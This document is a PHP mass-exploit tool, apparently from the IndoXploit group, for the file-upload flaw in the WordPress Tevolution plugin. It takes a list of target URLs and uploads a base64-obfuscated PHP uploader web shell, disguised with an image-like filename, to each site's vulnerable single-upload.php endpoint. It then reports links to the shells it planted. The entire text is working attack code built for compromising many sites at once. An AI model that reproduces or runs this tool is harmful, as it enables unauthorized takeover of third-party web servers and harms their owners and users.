WordPress Plugins Tevolution Mass Xploiter

1. <html>
2. <center>
3. <form method="post" enctype="multipart/form-data">
4. Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php.xxxjpg' required><br>
5. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
6. <input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
7. </form>
8. <?php
9. // IndoXploit
10. set_time_limit(0);
11. error_reporting(0);
12.  
13. function buffer() {
14.     ob_flush();
15.     flush();
16. }
17. function curl($url, $payload) {
18.     $ch = curl_init();
19.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
20.           curl_setopt($ch, CURLOPT_URL, $url);
21.           curl_setopt($ch, CURLOPT_POST, true);
22.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
23.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
24.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
25.           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
26.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
27.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
28.           curl_setopt($ch, CURLOPT_HEADER, 0);
29.           curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
30.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
31.     $res = curl_exec($ch);
32.           curl_close($ch);
33.     return $res;
34. }
35. $file = htmlspecialchars($_POST['filename']);
36. $site = explode("\r\n", $_POST['url']);
37. $do = $_POST['exp'];
38. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
39. if($do) {
40.     $y = date("Y");
41.     $m = date("m");
42.     $idx_dir = mkdir("indoxploit_tools", 0755);
43.     $shell = "indoxploit_tools/".$file;
44.     $fopen = fopen($shell, "w");
45.     fwrite($fopen, $uploader);
46.     fclose($fopen);
47.     foreach($site as $url) {
48.         $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
49.         $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
50.         $data = array(
51.             "Filedata" => "@$shell"
52.             );
53.         $curl = curl($target, $data);
54.         if($curl) {
55.             $cek = file_get_contents($cek_shell);
56.             if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
57.                 echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
58.             }
59.         }
60.     buffer();
61.     }
62. }
63. ?>